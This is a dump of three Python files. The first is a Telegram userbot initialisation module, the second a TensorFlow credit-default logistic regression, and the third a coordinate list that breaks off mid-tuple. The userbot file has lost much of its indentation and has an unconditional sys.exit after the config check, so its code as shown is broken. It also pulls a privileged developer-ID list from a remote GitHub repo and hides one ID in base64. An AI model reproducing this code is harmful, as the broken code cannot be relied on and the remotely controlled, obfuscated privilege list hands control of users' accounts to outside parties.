ext | sha | content
---|---|---|
py | 7df7bbea31b445bdfd968395733ae284e05abe14 | # Copyright (C) 2019 The Raphielscape Company LLC.
#
# Licensed under the Raphielscape Public License, Version 1.d (the "License");
# you may not use this file except in compliance with the License.
#
# inline credit @keselekpermen69
# Recode by @mrismanaziz
# t.me/SharingUserbot
#
""" Userbot initialization. """
import logging
import os
import re
import sys
import time
from base64 import b64decode
from distutils.util import strtobool as sb
from logging import DEBUG, INFO, basicConfig, getLogger
from math import ceil
from pathlib import Path
from platform import python_version
from sys import version_info
from dotenv import load_dotenv
from git import Repo
from pylast import LastFMNetwork, md5
from pySmartDL import SmartDL
from pytgcalls import PyTgCalls
from requests import get
from telethon import Button, version
from telethon.errors import UserIsBlockedError
from telethon.network.connection.tcpabridged import ConnectionTcpAbridged
from telethon.sessions import StringSession
from telethon.sync import TelegramClient, custom, events
from telethon.tl.types import InputWebDocument
from telethon.utils import get_display_name
from .storage import Storage
def STORAGE(n):
return Storage(Path("data") / n)
load_dotenv("config.env")
StartTime = time.time()
repo = Repo()
branch = repo.active_branch.name
# Global Variables
COUNT_MSG = 0
USERS = {}
COUNT_PM = {}
LASTMSG = {}
CMD_HELP = {}
CMD_LIST = {}
SUDO_LIST = {}
ZALG_LIST = {}
LOAD_PLUG = {}
INT_PLUG = ""
ISAFK = False
AFKREASON = None
ENABLE_KILLME = True
# Bot Logs setup:
logging.basicConfig(
format="[%(name)s] - [%(levelname)s] - %(message)s",
level=logging.INFO,
)
logging.getLogger("asyncio").setLevel(logging.ERROR)
logging.getLogger("pytgcalls").setLevel(logging.ERROR)
logging.getLogger("telethon.network.mtprotosender").setLevel(logging.ERROR)
logging.getLogger("telethon.network.connection.connection").setLevel(logging.ERROR)
LOGS = getLogger(__name__)
if version_info < (3, 9):
    LOGS.info(
        "You MUST have at least Python version 3.9. "
        "Several features depend on this Python version. Bot is stopping."
    )
    sys.exit(1)
# Check if the config was edited by using the already used variable.
# Basically, it's the 'virginity check' for the config file ;)
CONFIG_CHECK = os.environ.get(
"___________PLOX_______REMOVE_____THIS_____LINE__________", None
)
if CONFIG_CHECK:
    LOGS.info(
        "Please remove the line mentioned in the first hashtag from the config.env file"
    )
sys.exit(1)
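# Fetch the developer ID list from the remote repo, falling back to a
# hard-coded list if the request keeps failing.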
for attempt in range(6):
    _DEVS = get(
        "https://raw.githubusercontent.com/mrismanaziz/Reforestation/master/DEVS.json"
    )
    if _DEVS.status_code != 200:
        if attempt != 5:
            continue
        DEVS = [844432220, 1906014306, 1382636419, 2133486058]
        break
    DEVS = _DEVS.json()
    break
del _DEVS
SUDO_USERS = {int(x) for x in os.environ.get("SUDO_USERS", "").split()}
BL_CHAT = {int(x) for x in os.environ.get("BL_CHAT", "").split()}
# For Blacklist Group Support
BLACKLIST_CHAT = os.environ.get("BLACKLIST_CHAT", None)
if not BLACKLIST_CHAT:
BLACKLIST_CHAT = [-1001473548283]
# Telegram App KEY and HASH
API_KEY = int(os.environ.get("API_KEY") or 0)
API_HASH = str(os.environ.get("API_HASH") or None)
# Userbot Session String
STRING_SESSION = os.environ.get("STRING_SESSION", None)
STRING_2 = os.environ.get("STRING_2", None)
STRING_3 = os.environ.get("STRING_3", None)
STRING_4 = os.environ.get("STRING_4", None)
STRING_5 = os.environ.get("STRING_5", None)
# Logging channel/group ID configuration.
BOTLOG_CHATID = int(os.environ.get("BOTLOG_CHATID") or 0)
# Toggle for sending error reports to BOTLOG_CHATID; used by the bot PM
# handlers below (default assumed "True").
BOTLOG = sb(os.environ.get("BOTLOG", "True"))
# Load or No Load modules
LOAD = os.environ.get("LOAD", "").split()
NO_LOAD = os.environ.get("NO_LOAD", "").split()
# Bleep Blop, this is a bot ;)
PM_AUTO_BAN = sb(os.environ.get("PM_AUTO_BAN", "True"))
PM_LIMIT = int(os.environ.get("PM_LIMIT", 6))
# Custom Handler command
CMD_HANDLER = os.environ.get("CMD_HANDLER") or "."
SUDO_HANDLER = os.environ.get("SUDO_HANDLER", r"$")
# Support
GROUP = os.environ.get("GROUP", "SharingUserbot")
CHANNEL = os.environ.get("CHANNEL", "Lunatic0de")
# Heroku Credentials for updater.
HEROKU_APP_NAME = os.environ.get("HEROKU_APP_NAME", None)
HEROKU_API_KEY = os.environ.get("HEROKU_API_KEY", None)
# JustWatch Country
WATCH_COUNTRY = os.environ.get("WATCH_COUNTRY", "ID")
# Github Credentials for updater and Gitupload.
GIT_REPO_NAME = os.environ.get("GIT_REPO_NAME", None)
GITHUB_ACCESS_TOKEN = os.environ.get("GITHUB_ACCESS_TOKEN", None)
# Custom (forked) repo URL for updater.
UPSTREAM_REPO_URL = os.environ.get(
"UPSTREAM_REPO_URL", "https://github.com/dadkuy/Man-Userbot.git"
)
# Custom Name Sticker Pack
S_PACK_NAME = os.environ.get("S_PACK_NAME", None)
# SQL Database URI
DB_URI = os.environ.get("DATABASE_URL", None)
# OCR API key
OCR_SPACE_API_KEY = os.environ.get("OCR_SPACE_API_KEY", None)
# remove.bg API key
REM_BG_API_KEY = os.environ.get("REM_BG_API_KEY", None)
# Chrome Driver and Headless Google Chrome Binaries
CHROME_DRIVER = os.environ.get("CHROME_DRIVER") or "/usr/bin/chromedriver"
GOOGLE_CHROME_BIN = os.environ.get("GOOGLE_CHROME_BIN") or "/usr/bin/google-chrome"
# OpenWeatherMap API Key
OPEN_WEATHER_MAP_APPID = os.environ.get("OPEN_WEATHER_MAP_APPID", None)
WEATHER_DEFCITY = os.environ.get("WEATHER_DEFCITY", "Jakarta")
# Anti Spambot Config
ANTI_SPAMBOT = sb(os.environ.get("ANTI_SPAMBOT", "False"))
ANTI_SPAMBOT_SHOUT = sb(os.environ.get("ANTI_SPAMBOT_SHOUT", "False"))
# Custom text for the .alive command
ALIVE_TEKS_CUSTOM = os.environ.get("ALIVE_TEKS_CUSTOM", "Hey, I am alive.")
# Default .alive name
ALIVE_NAME = os.environ.get("ALIVE_NAME", "Dad")
# Custom Emoji Alive
ALIVE_EMOJI = os.environ.get("ALIVE_EMOJI", "🖕")
# Custom Inline Emoji
INLINE_EMOJI = os.environ.get("INLINE_EMOJI", "✘")
# Custom icon HELP
ICON_HELP = os.environ.get("ICON_HELP", "❉")
# Time & Date - Country and Time Zone
COUNTRY = str(os.environ.get("COUNTRY", "ID"))
TZ_NUMBER = int(os.environ.get("TZ_NUMBER", 1))
# Clean Welcome
CLEAN_WELCOME = sb(os.environ.get("CLEAN_WELCOME", "True"))
# Zipfile module
ZIP_DOWNLOAD_DIRECTORY = os.environ.get("ZIP_DOWNLOAD_DIRECTORY", "./zips")
# bit.ly module
BITLY_TOKEN = os.environ.get("BITLY_TOKEN", None)
# Bot version
BOT_VER = os.environ.get("BOT_VER", "3.1.3")
# Default .alive logo
ALIVE_LOGO = (
os.environ.get("ALIVE_LOGO") or "https://telegra.ph/file/f68543ad7bf3f32957d45.jpg"
)
INLINE_PIC = (
os.environ.get("INLINE_PIC") or "https://telegra.ph/file/9dc4e335feaaf6a214818.jpg"
)
# Picture For VCPLUGIN
PLAY_PIC = (
os.environ.get("PLAY_PIC") or "https://telegra.ph/file/6213d2673486beca02967.png"
)
QUEUE_PIC = (
os.environ.get("QUEUE_PIC") or "https://telegra.ph/file/d6f92c979ad96b2031cba.png"
)
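# "ODQ0NDMyMjIw" base64-decodes to the developer ID 844432220.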
DEFAULT = list(map(int, b64decode("ODQ0NDMyMjIw").split()))
# Last.fm Module
BIO_PREFIX = os.environ.get("BIO_PREFIX", None)
DEFAULT_BIO = os.environ.get("DEFAULT_BIO", None)
LASTFM_API = os.environ.get("LASTFM_API", None)
LASTFM_SECRET = os.environ.get("LASTFM_SECRET", None)
LASTFM_USERNAME = os.environ.get("LASTFM_USERNAME", None)
LASTFM_PASSWORD_PLAIN = os.environ.get("LASTFM_PASSWORD", None)
LASTFM_PASS = md5(LASTFM_PASSWORD_PLAIN) if LASTFM_PASSWORD_PLAIN else None
lastfm = None
if LASTFM_API and LASTFM_SECRET and LASTFM_USERNAME and LASTFM_PASS:
try:
lastfm = LastFMNetwork(
api_key=LASTFM_API,
api_secret=LASTFM_SECRET,
username=LASTFM_USERNAME,
password_hash=LASTFM_PASS,
)
except Exception:
pass
TEMP_DOWNLOAD_DIRECTORY = os.environ.get("TMP_DOWNLOAD_DIRECTORY", "./downloads/")
# Deezloader
DEEZER_ARL_TOKEN = os.environ.get("DEEZER_ARL_TOKEN", None)
# NSFW Detect DEEP AI
DEEP_AI = os.environ.get("DEEP_AI", None)
# Inline bot helper
BOT_TOKEN = os.environ.get("BOT_TOKEN", None)
BOT_USERNAME = os.environ.get("BOT_USERNAME", None)
# Do not delete this; removing it will cause errors
for attempt in range(6):
    _BLACKLIST = get(
        "https://raw.githubusercontent.com/mrismanaziz/Reforestation/master/manblacklist.json"
    )
    if _BLACKLIST.status_code != 200:
        if attempt != 5:
            continue
        blacklistman = []
        break
    blacklistman = _BLACKLIST.json()
    break
del _BLACKLIST
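# Fetch the global whitelist; fall back to an empty list if the request
# keeps failing.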
for attempt in range(6):
    _WHITELIST = get(
        "https://raw.githubusercontent.com/mrismanaziz/Reforestation/master/whitelist.json"
    )
    if _WHITELIST.status_code != 200:
        if attempt != 5:
            continue
        WHITELIST = []
        break
    WHITELIST = _WHITELIST.json()
    break
del _WHITELIST
# 'bot' variable
if STRING_SESSION:
session = StringSession(str(STRING_SESSION))
else:
session = "ManUserBot"
try:
bot = TelegramClient(
session=session,
api_id=API_KEY,
api_hash=API_HASH,
connection=ConnectionTcpAbridged,
auto_reconnect=True,
connection_retries=None,
)
call_py = PyTgCalls(bot)
except Exception as e:
print(f"STRING_SESSION - {e}")
sys.exit()
if STRING_2:
session2 = StringSession(str(STRING_2))
MAN2 = TelegramClient(
session=session2,
api_id=API_KEY,
api_hash=API_HASH,
connection=ConnectionTcpAbridged,
auto_reconnect=True,
connection_retries=None,
)
call_py2 = PyTgCalls(MAN2)
else:
MAN2 = None
if STRING_3:
session3 = StringSession(str(STRING_3))
MAN3 = TelegramClient(
session=session3,
api_id=API_KEY,
api_hash=API_HASH,
connection=ConnectionTcpAbridged,
auto_reconnect=True,
connection_retries=None,
)
call_py3 = PyTgCalls(MAN3)
else:
MAN3 = None
if STRING_4:
session4 = StringSession(str(STRING_4))
MAN4 = TelegramClient(
session=session4,
api_id=API_KEY,
api_hash=API_HASH,
connection=ConnectionTcpAbridged,
auto_reconnect=True,
connection_retries=None,
)
call_py4 = PyTgCalls(MAN4)
else:
MAN4 = None
if STRING_5:
session5 = StringSession(str(STRING_5))
MAN5 = TelegramClient(
session=session5,
api_id=API_KEY,
api_hash=API_HASH,
connection=ConnectionTcpAbridged,
auto_reconnect=True,
connection_retries=None,
)
call_py5 = PyTgCalls(MAN5)
else:
MAN5 = None
async def check_botlog_chatid() -> None:
if not BOTLOG_CHATID:
        LOGS.warning(
            "Your BOTLOG_CHATID var has not been set. Create a Telegram group, add the bot @MissRose_bot, type /id, and put the group id into the BOTLOG_CHATID var"
        )
sys.exit(1)
async def update_restart_msg(chat_id, msg_id):
DEFAULTUSER = ALIVE_NAME or "Set `ALIVE_NAME` ConfigVar!"
message = (
f"**Man-UserBot v{BOT_VER} is back up and running!**\n\n"
f"**Telethon:** {version.__version__}\n"
f"**Python:** {python_version()}\n"
f"**User:** {DEFAULTUSER}"
)
await bot.edit_message(chat_id, msg_id, message)
return True
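# If the bot was just restarted, edit the saved "restarting" message to
# confirm it is back up, then clear the stored restart status.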
try:
from userbot.modules.sql_helper.globals import delgvar, gvarstatus
chat_id, msg_id = gvarstatus("restartstatus").split("\n")
with bot:
try:
bot.loop.run_until_complete(update_restart_msg(int(chat_id), int(msg_id)))
except BaseException:
pass
delgvar("restartstatus")
except AttributeError:
pass
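# Assistant (inline helper) bot client, started only when BOT_TOKEN is set.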
if BOT_TOKEN is not None:
tgbot = TelegramClient(
"TG_BOT_TOKEN",
api_id=API_KEY,
api_hash=API_HASH,
connection=ConnectionTcpAbridged,
auto_reconnect=True,
connection_retries=None,
).start(bot_token=BOT_TOKEN)
else:
tgbot = None
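# Build the paginated inline help keyboard: one button per loadable module,
# arranged in a rows-by-columns grid, with prev/close/next navigation when the
# module list does not fit on a single page. The current page number is kept
# in the global `looters` so the re-open button can restore it.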
def paginate_help(page_number, loaded_modules, prefix):
number_of_rows = 6
number_of_cols = 2
global looters
looters = page_number
helpable_modules = [p for p in loaded_modules if not p.startswith("_")]
helpable_modules = sorted(helpable_modules)
modules = [
custom.Button.inline(
"{} {} {}".format(f"{INLINE_EMOJI}", x, f"{INLINE_EMOJI}"),
data="ub_modul_{}".format(x),
)
for x in helpable_modules
]
pairs = list(
zip(
modules[::number_of_cols],
modules[1::number_of_cols],
)
)
if len(modules) % number_of_cols == 1:
pairs.append((modules[-1],))
max_num_pages = ceil(len(pairs) / number_of_rows)
modulo_page = page_number % max_num_pages
if len(pairs) > number_of_rows:
pairs = pairs[
modulo_page * number_of_rows : number_of_rows * (modulo_page + 1)
] + [
(
custom.Button.inline(
"««", data="{}_prev({})".format(prefix, modulo_page)
),
            custom.Button.inline("Close", b"close"),
custom.Button.inline(
"»»", data="{}_next({})".format(prefix, modulo_page)
),
)
]
return pairs
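# Convert (text, url, same_line) button tuples into rows of Button.url
# objects; buttons flagged "same_line" are appended to the previous row.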
def ibuild_keyboard(buttons):
keyb = []
for btn in buttons:
if btn[2] and keyb:
keyb[-1].append(Button.url(btn[0], btn[1]))
else:
keyb.append([Button.url(btn[0], btn[1])])
return keyb
with bot:
try:
from userbot.modules.sql_helper.bot_blacklists import check_is_black_list
from userbot.modules.sql_helper.bot_pms_sql import add_user_to_db, get_user_id
from userbot.utils import reply_id
dugmeler = CMD_HELP
user = bot.get_me()
uid = user.id
owner = user.first_name
logo = ALIVE_LOGO
logoman = INLINE_PIC
tgbotusername = BOT_USERNAME
BTN_URL_REGEX = re.compile(
r"(\[([^\[]+?)\]\<buttonurl:(?:/{0,2})(.+?)(:same)?\>)"
)
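        # PM bridge: forward private messages sent to the assistant bot to the
        # userbot owner, and relay the owner's replies back to the original
        # sender using the message ids stored in the bot_pms_sql table.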
@tgbot.on(events.NewMessage(incoming=True, func=lambda e: e.is_private))
async def bot_pms(event):
chat = await event.get_chat()
if check_is_black_list(chat.id):
return
if chat.id != uid:
msg = await event.forward_to(uid)
try:
add_user_to_db(
msg.id, get_display_name(chat), chat.id, event.id, 0, 0
)
except Exception as e:
LOGS.error(str(e))
if BOTLOG:
await event.client.send_message(
                            BOTLOG_CHATID,
                            f"**ERROR:** While saving message details to the database\n`{str(e)}`",
)
else:
if event.text.startswith("/"):
return
reply_to = await reply_id(event)
if reply_to is None:
return
users = get_user_id(reply_to)
if users is None:
return
for usr in users:
user_id = int(usr.chat_id)
reply_msg = usr.reply_id
user_name = usr.first_name
break
if user_id is not None:
try:
if event.media:
msg = await event.client.send_file(
user_id,
event.media,
caption=event.text,
reply_to=reply_msg,
)
else:
msg = await event.client.send_message(
user_id,
event.text,
reply_to=reply_msg,
link_preview=False,
)
except UserIsBlockedError:
                        return await event.reply(
                            "❌ **This bot has been blocked by the user.**"
                        )
except Exception as e:
return await event.reply(f"**ERROR:** `{e}`")
try:
add_user_to_db(
reply_to, user_name, user_id, reply_msg, event.id, msg.id
)
except Exception as e:
LOGS.error(str(e))
if BOTLOG:
await event.client.send_message(
                                BOTLOG_CHATID,
                                f"**ERROR:** While saving message details to the database\n`{e}`",
)
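        # Inline query handler: an "@SharingUserbot" query from the owner opens
        # the paginated help menu, "repo" returns repository links, "Inline buttons"
        # builds a message with custom URL buttons, and anything else gets a
        # default info card.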
@tgbot.on(events.InlineQuery)
async def inline_handler(event):
builder = event.builder
result = None
query = event.text
if event.query.user_id == uid and query.startswith("@SharingUserbot"):
buttons = paginate_help(0, dugmeler, "helpme")
result = builder.photo(
file=logoman,
link_preview=False,
                    text=f"**✗ Man-Userbot Inline Menu ✗**\n\n✣ **Owner** [{user.first_name}](tg://user?id={user.id})\n✣ **Total** `{len(dugmeler)}` Modules",
buttons=buttons,
)
elif query.startswith("repo"):
result = builder.article(
title="Repository",
description="Repository Man - Userbot",
url="https://t.me/SharingUserbot",
thumb=InputWebDocument(INLINE_PIC, 0, "image/jpeg", []),
text="**Man - UserBot**\n➖➖➖➖➖➖➖➖➖➖\n✣ **Owner Repo :** [Risman](https://t.me/mrismanaziz)\n✣ **Support :** @Lunatic0de\n✣ **Repository :** [Man-Userbot](https://github.com/mrismanaziz/Man-Userbot)\n➖➖➖➖➖➖➖➖➖➖",
buttons=[
[
custom.Button.url("ɢʀᴏᴜᴘ", "https://t.me/SharingUserbot"),
custom.Button.url(
"ʀᴇᴘᴏ", "https://github.com/mrismanaziz/Man-Userbot"
),
],
],
link_preview=False,
)
elif query.startswith("Inline buttons"):
markdown_note = query[14:]
prev = 0
note_data = ""
buttons = []
for match in BTN_URL_REGEX.finditer(markdown_note):
n_escapes = 0
to_check = match.start(1) - 1
while to_check > 0 and markdown_note[to_check] == "\\":
n_escapes += 1
to_check -= 1
if n_escapes % 2 == 0:
buttons.append(
(match.group(2), match.group(3), bool(match.group(4)))
)
note_data += markdown_note[prev : match.start(1)]
prev = match.end(1)
elif n_escapes % 2 == 1:
note_data += markdown_note[prev:to_check]
prev = match.start(1) - 1
else:
break
else:
note_data += markdown_note[prev:]
message_text = note_data.strip()
tl_ib_buttons = ibuild_keyboard(buttons)
result = builder.article(
title="Inline creator",
text=message_text,
buttons=tl_ib_buttons,
link_preview=False,
)
else:
result = builder.article(
title="✗ Man-Userbot ✗",
description="Man - UserBot | Telethon",
url="https://t.me/SharingUserbot",
thumb=InputWebDocument(INLINE_PIC, 0, "image/jpeg", []),
text=f"**Man - UserBot**\n➖➖➖➖➖➖➖➖➖➖\n✣ **UserMode:** [{user.first_name}](tg://user?id={user.id})\n✣ **Assistant:** {tgbotusername}\n➖➖➖➖➖➖➖➖➖➖\n**Support:** @Lunatic0de\n➖➖➖➖➖➖➖➖➖➖",
buttons=[
[
custom.Button.url("ɢʀᴏᴜᴘ", "https://t.me/SharingUserbot"),
custom.Button.url(
"ʀᴇᴘᴏ", "https://github.com/mrismanaziz/Man-Userbot"
),
],
],
link_preview=False,
)
await event.answer(
[result], switch_pm="👥 USERBOT PORTAL", switch_pm_param="start"
)
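        # The callback-query handlers below drive the inline help menu:
        # re-open, page navigation (helpme_next / helpme_prev), close, and
        # per-module help pop-ups.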
@tgbot.on(events.callbackquery.CallbackQuery(data=re.compile(rb"reopen")))
async def on_plug_in_callback_query_handler(event):
if event.query.user_id == uid or event.query.user_id in SUDO_USERS:
current_page_number = int(looters)
buttons = paginate_help(current_page_number, dugmeler, "helpme")
                text = f"**✗ Man-Userbot Inline Menu ✗**\n\n✣ **Owner** [{user.first_name}](tg://user?id={user.id})\n✣ **Total** `{len(dugmeler)}` Modules"
await event.edit(
text,
file=logoman,
buttons=buttons,
link_preview=False,
)
else:
                reply_pop_up_alert = f"You are not allowed; this Userbot belongs to {owner}"
await event.answer(reply_pop_up_alert, cache_time=0, alert=True)
@tgbot.on(
events.callbackquery.CallbackQuery(
data=re.compile(rb"helpme_next\((.+?)\)")
)
)
async def on_plug_in_callback_query_handler(event):
if event.query.user_id == uid or event.query.user_id in SUDO_USERS:
current_page_number = int(event.data_match.group(1).decode("UTF-8"))
buttons = paginate_help(current_page_number + 1, dugmeler, "helpme")
await event.edit(buttons=buttons)
else:
                reply_pop_up_alert = (
                    f"You are not allowed; this Userbot belongs to {ALIVE_NAME}"
                )
await event.answer(reply_pop_up_alert, cache_time=0, alert=True)
@tgbot.on(events.callbackquery.CallbackQuery(data=re.compile(b"close")))
async def on_plug_in_callback_query_handler(event):
            if event.query.user_id == uid or event.query.user_id in DEVS or event.query.user_id in SUDO_USERS:
openlagi = custom.Button.inline("• Re-Open Menu •", data="reopen")
                await event.edit(
                    "⚜️ **Help Mode Button Closed!** ⚜️", buttons=openlagi
                )
else:
                reply_pop_up_alert = f"You are not allowed; this Userbot belongs to {owner}"
await event.answer(reply_pop_up_alert, cache_time=0, alert=True)
@tgbot.on(
events.callbackquery.CallbackQuery(
data=re.compile(rb"helpme_prev\((.+?)\)")
)
)
async def on_plug_in_callback_query_handler(event):
if event.query.user_id == uid or event.query.user_id in SUDO_USERS:
current_page_number = int(event.data_match.group(1).decode("UTF-8"))
buttons = paginate_help(current_page_number - 1, dugmeler, "helpme")
await event.edit(buttons=buttons)
else:
                reply_pop_up_alert = f"You are not allowed; this Userbot belongs to {owner}"
await event.answer(reply_pop_up_alert, cache_time=0, alert=True)
@tgbot.on(events.callbackquery.CallbackQuery(data=re.compile(b"ub_modul_(.*)")))
async def on_plug_in_callback_query_handler(event):
if event.query.user_id == uid or event.query.user_id in SUDO_USERS:
modul_name = event.data_match.group(1).decode("UTF-8")
cmdhel = str(CMD_HELP[modul_name])
if len(cmdhel) > 150:
help_string = (
str(CMD_HELP[modul_name])
.replace("`", "")
.replace("**", "")[:150]
+ "..."
                        + "\n\nTo read the full text, type .help "
+ modul_name
+ " "
)
else:
help_string = (
str(CMD_HELP[modul_name]).replace("`", "").replace("**", "")
)
reply_pop_up_alert = (
help_string
if help_string is not None
                        else "{} No documentation has been written for this module.".format(
modul_name
)
)
else:
                reply_pop_up_alert = f"You are not allowed; this Userbot belongs to {owner}"
await event.answer(reply_pop_up_alert, cache_time=0, alert=True)
except BaseException:
    LOGS.info(
        "Your inline bot's Help Mode is not active. It is fine to leave it disabled. "
        "To enable it, create a bot with @BotFather, then add the BOT_TOKEN and BOT_USERNAME vars. "
        "Go to @BotFather, open the bot settings » choose Inline mode » Turn on. "
    )
try:
bot.loop.run_until_complete(check_botlog_chatid())
except BaseException as e:
LOGS.exception(f"[BOTLOG] - {e}")
sys.exit(1)
|
py | 7df7bbf3bccb00247020623435ee88914e53b065 | import tensorflow as tf
from tensorflow.python.framework import graph_io
from tensorflow.python.framework import graph_util
from tensorflow import keras
from tensorflow.keras import layers
from tensorflow.keras import backend as K
import argparse
from tensorflow.python import errors_impl as errors
from utils import read_one_column
import os
import time
from utils import data_prep
parser = argparse.ArgumentParser()
parser.add_argument(
    '--predict', type=int, default=-1,
    help='Do a prediction on specified row of input file')
parser.add_argument('--input_file', type=str, default='final_data_with_feature_engineered.csv',
help='Location of input defaults to final_data_with_feature_engineered.csv')
parser.add_argument('--bench_prediction', type=int, default=-1,
help='Benchmark prediction doing n iterations and taking the average')
config = parser.parse_args()
epochs = 20
batch_size = 256
checkpoint_path = "./saved_models/train"
predict_row = config.predict
input_file = config.input_file
bench_prediction = config.bench_prediction
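# Freeze the session's variables into constants and write the resulting
# inference-only GraphDef to a protobuf file.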
def export_to_pb(sess, x, filename):
pred_names = ['output']
tf.identity(x, name=pred_names[0])
graph = graph_util.convert_variables_to_constants(sess, sess.graph.as_graph_def(), pred_names)
graph = graph_util.remove_training_nodes(graph)
path = graph_io.write_graph(graph, ".", filename, as_text=False)
print('saved the frozen graph (ready for inference) at: ', path)
def print_nodes(graph):
print([n.name for n in graph.as_graph_def().node])
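# Logistic regression expressed as a single bias-free sigmoid unit over the
# input features.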
def build_model(input_shape):
model = keras.Sequential([
layers.Dense(1, use_bias=False, activation='sigmoid', input_shape=[input_shape]),
])
model.compile(loss='binary_crossentropy',
optimizer=tf.train.AdamOptimizer(),
metrics=['accuracy'])
return model
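# Train on roughly the first 80% of rows, export a frozen inference graph,
# then report loss, accuracy, and AUC on the remaining 20%.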
def train(train_x_df, train_y_df):
x = list(train_x_df.columns.values)
model = build_model(len(x))
# Display training progress by printing a single dot for each completed epoch
class PrintDot(keras.callbacks.Callback):
def on_epoch_end(self, epoch, logs):
print('')
print('.', end='')
os.makedirs('./saved_models', exist_ok=True)
cp_callback = keras.callbacks.ModelCheckpoint(checkpoint_path,
save_weights_only=True,
save_best_only=True,
verbose=1)
# first 80 percent for training
train_x = train_x_df[1:246005]
train_y = train_y_df[1:246005]
# other 20 percent for evaluating
eval_x = train_x_df[246006:len(train_x_df) - 1]
eval_y = train_y_df[246006:len(train_y_df) - 1]
# train model
model.fit(train_x, train_y, epochs=epochs,
validation_split=0.2, verbose=0, batch_size=batch_size,
callbacks=[cp_callback])
print('done training')
# get the default session and graph for exporting and calculating the AUC
sess = K.get_session()
graph = K.get_session().graph
# export the graph to a protobuf file for loading in tfe and secure enclave
export_to_pb(K.get_session(),
graph.get_tensor_by_name('dense/Sigmoid:0'),
'house_credit_default.pb')
# evaluate the model and get the AUC, the metric used in the kaggle competition
loss = model.evaluate(eval_x, eval_y, batch_size=batch_size)
predictions = model.predict(eval_x, batch_size=batch_size)
auc = tf.metrics.auc(eval_y, predictions)
print("Evaluation Loss:", loss[0])
print("Accuracy:", loss[1])
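    # tf.metrics.auc creates local variables that must be initialized before
    # the metric tensor can be evaluated in this session.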
sess.run(tf.global_variables_initializer())
sess.run(tf.local_variables_initializer())
print("AUC: ", sess.run([auc])[0][1])
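# Build the model and load the saved weights (training first if no checkpoint
# exists), then read the requested input row for prediction.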
def predict_preamble(train_x_df, train_y_df):
x = list(train_x_df.columns.values)
model = build_model(len(x))
try:
model.load_weights(checkpoint_path)
    except errors.InvalidArgumentError:
        print("Weights couldn't be found, training before predicting")
        train(train_x_df, train_y_df)
        model = build_model(len(x))
        model.load_weights(checkpoint_path)
x = read_one_column(predict_row, train_x_df)
return model, x
def predict(train_x_df, train_y_df):
model, x = predict_preamble(train_x_df, train_y_df)
print("Prediction:", model.predict(x)[0][0])
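# Time repeated predictions on a single row and report the total and average
# latency in milliseconds.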
def benchmark(train_x_df, train_y_df):
model, x = predict_preamble(train_x_df, train_y_df)
total_duration = 0
for i in range(0, bench_prediction):
start = time.time()
model.predict(x)
end = time.time()
duration = end - start
total_duration = total_duration + duration
print("Total Duration:", total_duration)
print("Avg Runtime:", total_duration / bench_prediction * 1000, "ms")
def main():
print('Home Credit Default!')
# TODO only load all data when training
train_x_df, train_y_df = data_prep(input_file)
if predict_row != -1:
predict(train_x_df, train_y_df)
elif bench_prediction != -1:
benchmark(train_x_df, train_y_df)
else:
train(train_x_df, train_y_df)
if __name__ == '__main__':
main()
|
py | 7df7bc6a312f6f47f1ddec6e5aa64b6e4dc33f36 | coordinates_E0E1E1 = ((126, 111),
(126, 112), (126, 114), (127, 93), (127, 104), (127, 108), (127, 109), (127, 110), (127, 111), (127, 112), (128, 82), (128, 93), (128, 94), (128, 104), (128, 107), (129, 81), (129, 82), (129, 93), (129, 95), (129, 104), (129, 106), (129, 108), (130, 80), (130, 82), (130, 93), (130, 96), (130, 104), (130, 106), (130, 108), (131, 79), (131, 82), (131, 94), (131, 97), (131, 104), (131, 107), (132, 78), (132, 80), (132, 82), (132, 94), (132, 96), (132, 98), (132, 104), (132, 107), (133, 74), (133, 76), (133, 77), (133, 79), (133, 80), (133, 81), (133, 84), (133, 94), (133, 96), (133, 97), (133, 99), (133, 103), (133, 105), (133, 106), (133, 108), (133, 129), (134, 75), (134, 78), (134, 79), (134, 80), (134, 81), (134, 82), (134, 85), (134, 93), (134, 95), (134, 96), (134, 97), (134, 98), (134, 101), (134, 104),
(134, 105), (134, 106), (134, 108), (135, 77), (135, 79), (135, 80), (135, 81), (135, 82), (135, 83), (135, 84), (135, 87), (135, 88), (135, 92), (135, 93), (135, 94), (135, 95), (135, 96), (135, 97), (135, 98), (135, 99), (135, 103), (135, 104), (135, 109), (135, 130), (136, 77), (136, 79), (136, 89), (136, 90), (136, 91), (136, 93), (136, 94), (136, 95), (136, 96), (136, 97), (136, 98), (136, 99), (136, 100), (136, 101), (136, 102), (136, 105), (136, 106), (136, 110), (136, 122), (136, 130), (137, 77), (137, 80), (137, 81), (137, 82), (137, 83), (137, 84), (137, 85), (137, 86), (137, 87), (137, 92), (137, 93), (137, 94), (137, 95), (137, 96), (137, 97), (137, 98), (137, 99), (137, 100), (137, 101), (137, 102), (137, 103), (137, 104), (137, 108), (137, 111), (137, 122), (137, 130), (138, 77), (138, 79),
(138, 88), (138, 91), (138, 92), (138, 93), (138, 94), (138, 95), (138, 96), (138, 97), (138, 98), (138, 99), (138, 100), (138, 102), (138, 109), (138, 111), (138, 122), (138, 130), (139, 76), (139, 77), (139, 90), (139, 92), (139, 93), (139, 94), (139, 95), (139, 96), (139, 97), (139, 98), (139, 99), (139, 100), (139, 102), (139, 109), (139, 112), (139, 122), (139, 130), (140, 72), (140, 74), (140, 76), (140, 91), (140, 93), (140, 94), (140, 95), (140, 96), (140, 97), (140, 98), (140, 99), (140, 100), (140, 102), (140, 110), (140, 113), (140, 122), (140, 130), (141, 72), (141, 76), (141, 91), (141, 93), (141, 94), (141, 95), (141, 96), (141, 97), (141, 98), (141, 99), (141, 100), (141, 101), (141, 103), (141, 110), (141, 113), (141, 122), (141, 123), (141, 130), (141, 134), (142, 73), (142, 75), (142, 92),
(142, 94), (142, 95), (142, 96), (142, 97), (142, 98), (142, 99), (142, 100), (142, 101), (142, 102), (142, 104), (142, 110), (142, 112), (142, 122), (142, 123), (142, 130), (142, 135), (143, 73), (143, 75), (143, 92), (143, 94), (143, 95), (143, 96), (143, 97), (143, 98), (143, 99), (143, 100), (143, 101), (143, 102), (143, 103), (143, 105), (143, 110), (143, 112), (143, 122), (143, 123), (143, 130), (143, 131), (143, 134), (144, 74), (144, 92), (144, 94), (144, 95), (144, 96), (144, 97), (144, 98), (144, 99), (144, 100), (144, 101), (144, 102), (144, 103), (144, 106), (144, 107), (144, 108), (144, 109), (144, 111), (144, 121), (144, 123), (144, 129), (144, 132), (145, 85), (145, 90), (145, 91), (145, 92), (145, 93), (145, 94), (145, 95), (145, 96), (145, 97), (145, 98), (145, 99), (145, 100), (145, 101), (145, 102),
